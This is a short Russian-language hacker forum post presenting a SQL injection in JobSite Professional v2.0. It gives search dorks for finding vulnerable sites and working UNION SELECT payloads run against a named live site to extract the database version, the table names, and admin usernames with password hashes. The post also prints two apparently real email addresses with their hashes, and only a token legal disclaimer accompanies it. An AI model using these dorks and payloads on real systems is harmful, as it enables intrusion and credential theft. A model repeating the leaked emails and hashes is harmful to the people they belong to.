![]() |
SQL-inj в JobSite Professional v2.0
Программа: JobSite Professional v2.0
Цитата:
Код:
http://[site]/File.php?id=[sql]inurl:index.php?page=en_jobseekers - английская версия inurl:index.php?page=fr_Candidats - французская версия Пример: _www.milkround.ie Cмотрим версию мускула, пользователя, базу: Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8/*Смотрим названия таблиц, меняя лимит: Код:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*Интересные таблицы: Код:
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD),4,5,6,7,8+FROM+websiteadmin_admin_users/*scottbrien@hotmail.com:18859128760e989630b7d2073db 3f1ba lizodonovan@eircom.net:cb0be83e6cb9e65c62da133391b 77a49 PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас. AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-) www.milw0rm.com |
| Время: 06:22 |